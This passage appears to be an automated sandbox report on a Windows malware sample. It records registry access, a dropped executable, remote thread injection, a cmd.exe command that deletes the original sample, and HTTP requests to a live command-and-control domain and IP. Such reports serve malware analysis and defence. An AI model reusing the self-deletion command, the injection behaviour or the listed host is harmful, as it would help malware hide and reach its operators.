HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​NameSpace_Catalog5\​Catalog_Entries\​000000000001  SupportedNameSpace  12 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​NameSpace_Catalog5\​Catalog_Entries\​000000000001  Version 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​NameSpace_Catalog5\​Catalog_Entries\​000000000002  DisplayString  NTDS 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​NameSpace_Catalog5\​Catalog_Entries\​000000000002  Enabled 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​NameSpace_Catalog5\​Catalog_Entries\​000000000002  LibraryPath  %SystemRoot%\​System32\​winrnr.dll 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​NameSpace_Catalog5\​Catalog_Entries\​000000000002  ProviderId  0xee37263b80e5cf11a55500c04fd8d4ac 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​NameSpace_Catalog5\​Catalog_Entries\​000000000002  StoresServiceClassInfo 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​NameSpace_Catalog5\​Catalog_Entries\​000000000002  SupportedNameSpace  32 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​NameSpace_Catalog5\​Catalog_Entries\​000000000002  Version 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​NameSpace_Catalog5\​Catalog_Entries\​000000000003  DisplayString  Network Location Awareness (NLA) Namespace 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​NameSpace_Catalog5\​Catalog_Entries\​000000000003  Enabled 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​NameSpace_Catalog5\​Catalog_Entries\​000000000003  LibraryPath  %SystemRoot%\​System32\​mswsock.dll 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​NameSpace_Catalog5\​Catalog_Entries\​000000000003  ProviderId  0x3a244266a83ba64abaa52e0bd71fdd83 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​NameSpace_Catalog5\​Catalog_Entries\​000000000003  StoresServiceClassInfo 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​NameSpace_Catalog5\​Catalog_Entries\​000000000003  SupportedNameSpace  15 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​NameSpace_Catalog5\​Catalog_Entries\​000000000003  Version 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​Protocol_Catalog9  Next_Catalog_Entry_ID  1012 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​Protocol_Catalog9  Num_Catalog_Entries  11 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​Protocol_Catalog9  Serial_Access_Num 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​Protocol_Catalog9\​Catalog_Entries\​000000000001  PackedCatalogItem  %SystemRoot%\​system32\​mswsock. 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​Protocol_Catalog9\​Catalog_Entries\​000000000002  PackedCatalogItem  %SystemRoot%\​system32\​mswsock. 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​Protocol_Catalog9\​Catalog_Entries\​000000000003  PackedCatalogItem  %SystemRoot%\​system32\​mswsock. 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​Protocol_Catalog9\​Catalog_Entries\​000000000004  PackedCatalogItem  %SystemRoot%\​system32\​rsvpsp.d 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​Protocol_Catalog9\​Catalog_Entries\​000000000005  PackedCatalogItem  %SystemRoot%\​system32\​rsvpsp.d 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​Protocol_Catalog9\​Catalog_Entries\​000000000006  PackedCatalogItem  %SystemRoot%\​system32\​mswsock. 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​Protocol_Catalog9\​Catalog_Entries\​000000000007  PackedCatalogItem  %SystemRoot%\​system32\​mswsock. 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​Protocol_Catalog9\​Catalog_Entries\​000000000008  PackedCatalogItem  %SystemRoot%\​system32\​mswsock. 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​Protocol_Catalog9\​Catalog_Entries\​000000000009  PackedCatalogItem  %SystemRoot%\​system32\​mswsock. 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​Protocol_Catalog9\​Catalog_Entries\​000000000010  PackedCatalogItem  %SystemRoot%\​system32\​mswsock. 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​Protocol_Catalog9\​Catalog_Entries\​000000000011  PackedCatalogItem  %SystemRoot%\​system32\​mswsock. 
HKLM\​System\​Setup  SystemSetupInProgress 
HKLM\​System\​WPA\​PnP  seed  1374283966 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Environment  TEMP  %USERPROFILE%\​Local Settings\​Temp  22 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Environment  TMP  %USERPROFILE%\​Local Settings\​Temp  22 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​SOFTWARE\​Microsoft\​Windows\​CurrentVersion\​Internet Settings  CertificateRevocation 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​SOFTWARE\​Microsoft\​Windows\​CurrentVersion\​Internet Settings  DisableCachingOfSSLPages 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​SOFTWARE\​Microsoft\​Windows\​CurrentVersion\​Internet Settings  EnableHttp1_1 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​SOFTWARE\​Microsoft\​Windows\​CurrentVersion\​Internet Settings  EnableNegotiate 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​SOFTWARE\​Microsoft\​Windows\​CurrentVersion\​Internet Settings  MimeExclusionListForCache  multipart/mixed multipart/x-mixed-replace multipart/x-byteranges  
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​SOFTWARE\​Microsoft\​Windows\​CurrentVersion\​Internet Settings  SecureProtocols  160 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​SOFTWARE\​Microsoft\​Windows\​CurrentVersion\​Internet Settings  User Agent  Mozilla/4.0 (compatible; MSIE 7.0; Win32) 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​SOFTWARE\​Microsoft\​Windows\​CurrentVersion\​Internet Settings  WarnOnPost  0x01000000 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​SOFTWARE\​Microsoft\​Windows\​CurrentVersion\​Internet Settings  WarnOnZoneCrossing 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows NT\​CurrentVersion\​Winlogon  ParseAutoexec  11 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Explorer\​  ShellState  0x2400000033880000000000000000000000000000010000000d0000000000 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Explorer\​Advanced  DontPrettyPath 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Explorer\​Advanced  Filter 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Explorer\​Advanced  Hidden 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Explorer\​Advanced  HideFileExt 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Explorer\​Advanced  HideIcons 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Explorer\​Advanced  MapNetDrvBtn 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Explorer\​Advanced  NoNetCrawling 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Explorer\​Advanced  SeparateProcess 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Explorer\​Advanced  ShowCompColor 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Explorer\​Advanced  ShowInfoTip 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Explorer\​Advanced  ShowSuperHidden 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Explorer\​Advanced  WebView 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Explorer\​MountPoints2\​CPC\​Volume\​{d14d83ce-7d74-11dc-97e2-806d6172696f}\​  Data  0x000000005c005c003f005c0049004400450023004300640052006f006d00 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Explorer\​MountPoints2\​CPC\​Volume\​{d14d83ce-7d74-11dc-97e2-806d6172696f}\​  Generation 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Explorer\​MountPoints2\​CPC\​Volume\​{d14d83cf-7d74-11dc-97e2-806d6172696f}\​  Data  0x000000005c005c003f005c00530054004f00520041004700450023005600 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Explorer\​MountPoints2\​CPC\​Volume\​{d14d83cf-7d74-11dc-97e2-806d6172696f}\​  Generation 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Explorer\​Shell Folders  Cache  C:\​Documents and Settings\​user\​Local Settings\​Temporary Internet Files 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Explorer\​User Shell Folders  AppData  %USERPROFILE%\​Application Data  10 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Explorer\​User Shell Folders  Cache  %USERPROFILE%\​Local Settings\​Temporary Internet Files 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Explorer\​User Shell Folders  Cookies  %USERPROFILE%\​Cookies 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Explorer\​User Shell Folders  Desktop  %USERPROFILE%\​Desktop 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Explorer\​User Shell Folders  History  %USERPROFILE%\​Local Settings\​History 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Explorer\​User Shell Folders  Local Settings  %USERPROFILE%\​Local Settings 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Explorer\​User Shell Folders  Personal  %USERPROFILE%\​My Documents 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Internet Settings\​5.0\​Cache  Signature  Client UrlCache MMF Ver 5.2 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Internet Settings\​5.0\​Cache\​Content  CacheLimit  163410 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Internet Settings\​5.0\​Cache\​Content  CachePrefix   
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Internet Settings\​5.0\​Cache\​Cookies  CacheLimit  8192 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Internet Settings\​5.0\​Cache\​Cookies  CachePrefix  Cookie: 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Internet Settings\​5.0\​Cache\​Extensible Cache\​MSHist012008051620080517  CacheLimit  8192 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Internet Settings\​5.0\​Cache\​Extensible Cache\​MSHist012008051620080517  CacheOptions  11 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Internet Settings\​5.0\​Cache\​Extensible Cache\​MSHist012008051620080517  CachePath  %USERPROFILE%\​Local Settings\​History\​History.IE5\​MSHist012008051620080517 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Internet Settings\​5.0\​Cache\​Extensible Cache\​MSHist012008051620080517  CachePrefix  :2008051620080517:  
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Internet Settings\​5.0\​Cache\​Extensible Cache\​MSHist012008051620080517  CacheRepair 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Internet Settings\​5.0\​Cache\​Extensible Cache\​UserData  CacheLimit  1000 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Internet Settings\​5.0\​Cache\​Extensible Cache\​UserData  CacheOptions 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Internet Settings\​5.0\​Cache\​Extensible Cache\​UserData  CachePath  %USERPROFILE%\​UserData 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Internet Settings\​5.0\​Cache\​Extensible Cache\​UserData  CachePrefix  UserData 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Internet Settings\​5.0\​Cache\​Extensible Cache\​UserData  CacheRepair 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Internet Settings\​5.0\​Cache\​Extensible Cache\​feedplat  CacheLimit  8192 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Internet Settings\​5.0\​Cache\​Extensible Cache\​feedplat  CacheOptions 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Internet Settings\​5.0\​Cache\​Extensible Cache\​feedplat  CachePath  %USERPROFILE%\​Local Settings\​Application Data\​Microsoft\​Feeds Cache 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Internet Settings\​5.0\​Cache\​Extensible Cache\​feedplat  CachePrefix  feedplat: 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Internet Settings\​5.0\​Cache\​Extensible Cache\​feedplat  CacheRepair 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Internet Settings\​5.0\​Cache\​History  CacheLimit  8192 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Internet Settings\​5.0\​Cache\​History  CachePrefix  Visited: 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Internet Settings\​ZoneMap\​  AutoDetect 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Internet Settings\​ZoneMap\​\​ProtocolDefaults\​     
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Internet Settings\​ZoneMap\​\​ProtocolDefaults\​  @ivt 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Internet Settings\​ZoneMap\​\​ProtocolDefaults\​  file 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Internet Settings\​ZoneMap\​\​ProtocolDefaults\​  ftp 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Internet Settings\​ZoneMap\​\​ProtocolDefaults\​  http 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Internet Settings\​ZoneMap\​\​ProtocolDefaults\​  https 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Internet Settings\​ZoneMap\​\​ProtocolDefaults\​  shell 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Internet Settings\​Zones\​0  1806 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Internet Settings\​Zones\​0  Flags  33 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Internet Settings\​Zones\​1  Flags  475 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Internet Settings\​Zones\​2  Flags  71 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Internet Settings\​Zones\​3  1A10 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Internet Settings\​Zones\​3  Flags 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Internet Settings\​Zones\​4  Flags 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​ShellNoRoam\​MUICache  LangID  0x0904 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​ShellNoRoam\​MUICache\​  C:\WINDOWS\system32\cmd.exe  Windows Command Processor 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​windows\​CurrentVersion\​Internet Settings  MigrateProxy 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​windows\​CurrentVersion\​Internet Settings  ProxyEnable 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​windows\​CurrentVersion\​Internet Settings\​Connections  DefaultConnectionSettings  0x3c0000000200000001000000000000000000000000000000040000000000 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​windows\​CurrentVersion\​Internet Settings\​Connections  SavedLegacySettings  0x460000006700000001000000000000000000000000000000040000000000 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Volatile Environment  APPDATA  C:\​Documents and Settings\​user\​Application Data  22 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Volatile Environment  CLIENTNAME    22 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Volatile Environment  HOMEDRIVE  C:  22 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Volatile Environment  HOMEPATH  \​Documents and Settings\​user  22 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Volatile Environment  HOMESHARE    22 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Volatile Environment  LOGONSERVER  \​\​USER  22 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Volatile Environment  SESSIONNAME  Console  22 

  - Monitored Registry Keys:  
Key Name Watch subtree Notify Filter Count
HKLM\​Software\​Classes  Key Change,Value Change 
HKLM\​Software\​Classes\​CLSID  Key Change,Value Change 
HKLM\​Software\​Microsoft\​COM3  Key Change,Value Change 
HKLM\​Software\​Microsoft\​Tracing\​RASAPI32  Attributes Change,Value Change,Security Descriptor Change 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​NameSpace_Catalog5  Key Change 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​Protocol_Catalog9  Key Change 
HKU  Key Change,Value Change 

2.b) sample.exe - File Activities

  - Files Created:  
C:\Documents and Settings\user\Local Settings\Temporary Internet Files\Content.IE5\5E7EYQDH\pzmwjkoopp[1].htm
C:\Documents and Settings\user\Local Settings\Temporary Internet Files\Content.IE5\5E7EYQDH\uaobttgu[1].htm
C:\Documents and Settings\user\Local Settings\Temporary Internet Files\Content.IE5\5E7EYQDH\yheess[1].htm
C:\Documents and Settings\user\Local Settings\Temporary Internet Files\Content.IE5\BNPHK11H\fcdzd[1].htm
C:\Documents and Settings\user\Local Settings\Temporary Internet Files\Content.IE5\BNPHK11H\wfcdqr[1].htm
C:\Documents and Settings\user\Local Settings\Temporary Internet Files\Content.IE5\C4H05OWL\fivijnnboc[1].htm
C:\Documents and Settings\user\Local Settings\Temporary Internet Files\Content.IE5\C4H05OWL\vfcggulym[1].htm
C:\Documents and Settings\user\Local Settings\Temporary Internet Files\Content.IE5\MBYNVPWZ\ccznrrs[1].txt
C:\Documents and Settings\user\Local Settings\Temporary Internet Files\Content.IE5\MBYNVPWZ\flvjj[1].htm
c:\bwhqnaix.exe

  - Files Read:  
C:\Documents and Settings\All Users\Documents\desktop.ini
C:\Documents and Settings\user\My Documents\desktop.ini
C:\WINDOWS\Registration\R00000000000f.clb
C:\WINDOWS\system32\cmd.exe
C:\WINDOWS\win.ini
C:\sample.exe
PIPE\lsarpc
PIPE\wkssvc
c:\autoexec.bat

  - Files Modified:  
C:\Documents and Settings\user\Local Settings\Temporary Internet Files\Content.IE5\5E7EYQDH\pzmwjkoopp[1].htminfo
C:\Documents and Settings\user\Local Settings\Temporary Internet Files\Content.IE5\5E7EYQDH\uaobttgu[1].htminfo
C:\Documents and Settings\user\Local Settings\Temporary Internet Files\Content.IE5\5E7EYQDH\yheess[1].htminfo
C:\Documents and Settings\user\Local Settings\Temporary Internet Files\Content.IE5\BNPHK11H\fcdzd[1].htminfo
C:\Documents and Settings\user\Local Settings\Temporary Internet Files\Content.IE5\BNPHK11H\wfcdqr[1].htminfo
C:\Documents and Settings\user\Local Settings\Temporary Internet Files\Content.IE5\C4H05OWL\fivijnnboc[1].htminfo
C:\Documents and Settings\user\Local Settings\Temporary Internet Files\Content.IE5\C4H05OWL\vfcggulym[1].htminfo
C:\Documents and Settings\user\Local Settings\Temporary Internet Files\Content.IE5\MBYNVPWZ\ccznrrs[1].txtinfo
C:\Documents and Settings\user\Local Settings\Temporary Internet Files\Content.IE5\MBYNVPWZ\flvjj[1].htminfo
MountPointManagerinfo
PIPE\lsarpcinfo
PIPE\wkssvcinfo
WMIDataDeviceinfo
\Device\Afd\AsyncConnectHlpinfo
\Device\Afd\Endpointinfo
\Device\RasAcdinfo
c:\bwhqnaix.exeinfo

  - File System Control Communication:  
File Control Code Times
PIPE\lsarpc  0x0011C017  80 
PIPE\wkssvc  0x0011C017 

  - Device Control Communication:  
File Control Code Times
WMIDataDevice  0x0022414C 
WMIDataDevice  0x00228144 
\Device\KsecDD  0x00390008 
\Device\Afd\Endpoint  AFD_GET_INFO (0x0001207B) 
\Device\Afd\Endpoint  AFD_SET_CONTEXT (0x00012047)  72 
\Device\Afd\Endpoint  AFD_BIND (0x00012003) 
\Device\Afd\Endpoint  AFD_GET_TDI_HANDLES (0x00012037)  18 
\Device\Afd\Endpoint  AFD_GET_SOCK_NAME (0x0001202F) 
\Device\Afd\Endpoint  AFD_SET_INFO (0x0001203B)  18 
\Device\Afd\AsyncConnectHlp  AFD_CONNECT (0x00012007) 
\Device\Afd\Endpoint  AFD_SELECT (0x00012024) 
unnamed file  0x00120028  17 
\Device\Afd\Endpoint  AFD_SEND (0x0001201F) 
\Device\Afd\Endpoint  AFD_RECV (0x00012017)  16 
IDE#CdRomQEMU_QEMU_CD-ROM________________________0.9.____#4d51303030302033202020202020202020202020#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}  0x004D0008 
MountPointManager  0x006D0008 
STORAGE#Volume#1&30a96598&0&Signature95619561Offset7E00Length13F291800#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}  0x004D0008 
MountPointManager  0x006D0034 

  - Memory Mapped Files:  
File Name
C:\WINDOWS\System32\mswsock.dll
C:\WINDOWS\System32\wshtcpip.dll
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.5512_x-ww_35d4ce83\comctl32.dll
C:\WINDOWS\WindowsShell.Manifest
C:\WINDOWS\system32\Apphelp.dll
C:\WINDOWS\system32\CLBCATQ.DLL
C:\WINDOWS\system32\COMRes.dll
C:\WINDOWS\system32\DCIMAN32.dll
C:\WINDOWS\system32\DDRAW.dll
C:\WINDOWS\system32\DNSAPI.dll
C:\WINDOWS\system32\MSCTF.dll
C:\WINDOWS\system32\RASAPI32.dll
C:\WINDOWS\system32\SETUPAPI.dll
C:\WINDOWS\system32\SHELL32.dll
C:\WINDOWS\system32\TAPI32.dll
C:\WINDOWS\system32\WINMM.dll
C:\WINDOWS\system32\WS2HELP.dll
C:\WINDOWS\system32\cmd.exe
C:\WINDOWS\system32\comctl32.dll
C:\WINDOWS\system32\hnetcfg.dll
C:\WINDOWS\system32\rasadhlp.dll
C:\WINDOWS\system32\rasman.dll
C:\WINDOWS\system32\rpcss.dll
C:\WINDOWS\system32\rtutils.dll
C:\WINDOWS\system32\sensapi.dll
C:\WINDOWS\system32\ws2_32.dll
C:\Windows\AppPatch\sysmain.sdb
c:\bwhqnaix.exe

2.c) sample.exe - Windows Service Activities

  - Services Started:  
RASMAN

2.d) sample.exe - Process Activities

  - Processes Created:  
Executable Command Line
c:\bwhqnaix.exe   
  c:\bwhqnaix.exe 
C:\WINDOWS\system32\cmd.exe   
C:\WINDOWS\system32\cmd.exe  "C:\WINDOWS\system32\cmd.exe" /c del C:\sample.exe > nul 

  - Remote Threads Created:  
Affected Process
c:\bwhqnaix.exe
C:\WINDOWS\system32\cmd.exe

  - Thread Overview:  
Time Number of threads
After 15 seconds
After 79 seconds
After 97 seconds
After 122 seconds

  - Foreign Memory Regions Read:  
Process: C:\WINDOWS\system32\cmd.exe
Process: c:\bwhqnaix.exe

  - Foreign Memory Regions Written:  
Process: C:\WINDOWS\system32\cmd.exe
Process: c:\bwhqnaix.exe

2.e) sample.exe - Network Activity

  - DNS Queries:  
Name Query Type Query Result Successful Protocol
ccmguyldmn.com  DNS_TYPE_A  195.2.253.240   

  -  HTTP Conversations:  
From ANUBIS:1032 to 195.2.253.240:80 - [ccmguyldmn.com]
Request: GET /progs/ltqrivj/yheess.php?adv=adv512
Response: 200 "OK"
Request: GET /progs/ltqrivj/uaobttgu.php
Response: 200 "OK"
Request: GET /progs/ltqrivj/fcdzd.php
Response: 200 "OK"
Request: GET /progs/ltqrivj/wfcdqr.php
Response: 200 "OK"
Request: GET /progs/ltqrivj/fivijnnboc.php
Response: 200 "OK"
Request: GET /progs/ltqrivj/vfcggulym.php
Response: 200 "OK"
Request: GET /progs/ltqrivj/flvjj.php
Response: 200 "OK"
Request: GET /progs/ltqrivj/ccznrrs
Response: 200 "OK"
Request: GET /progs/ltqrivj/pzmwjkoopp.php?adv=adv512&code1=LNLD&code2=3115&id=1824245000&p=1
Response: 200 "OK"
Request: GET /uniq.php?id=1824245000&p=1
Response: 200 "OK"

  -  Unknown TCP Traffic:  
from ANUBIS:1033 to 195.2.253.240:80
State: Normal establishment and termination - Transferred outbound Bytes: 209 - Transferred inbound Bytes: 883
Data sent: 
    
4745 5420 2f70 726f 6773 2f6c 7471 7269    GET /progs/ltqri
766a 2f75 616f 6274 7467 752e 7068 7020    vj/uaobttgu.php 
4854 5450 2f31 2e31 0d0a 5573 6572 2d41    HTTP/1.1..User-A
6765 6e74 3a20 4d6f 7a69 6c6c 612f 342e    gent: Mozilla/4.
3020 2863 6f6d 7061 7469 626c 653b 204d    0 (compatible; M
5349 4520 372e 303b 2057 696e 646f 7773    SIE 7.0; Windows
204e 5420 352e 313b 202e 4e45 5420 434c     NT 5.1; .NET CL
5220 312e 312e 3433 3232 3b20 2e4e 4554    R 1.1.4322; .NET
2043 4c52 2032 2e30 2e35 3037 3237 3b20     CLR 2.0.50727; 
2e4e 4554 2043 4c52 2033 2e30 2e30 3435    .NET CLR 3.0.045
3036 2e33 303b 2049 6e66 6f50 6174 682e    06.30; InfoPath.
3129 7665 7233 340d 0a48 6f73 743a 2063    1)ver34..Host: c
636d 6775 796c 646d 6e2e 636f 6d0d 0a0d    cmguyldmn.com...
0a                                         .
Data received: 
    
4854 5450 2f31 2e31 2032 3030 204f 4b0d    HTTP/1.1 200 OK.
0a44 6174 653a 2057 6564 2c20 3031 204a    .Date: Wed, 01 J
756c 2032 3030 3920 3135 3a35 353a 3336    ul 2009 15:55:36
2047 4d54 0d0a 5365 7276 6572 3a20 4170     GMT..Server: Ap
6163 6865 2f32 2e32 2e31 3120 2846 6564    ache/2.2.11 (Fed
6f72 6129 0d0a 582d 506f 7765 7265 642d    ora)..X-Powered-
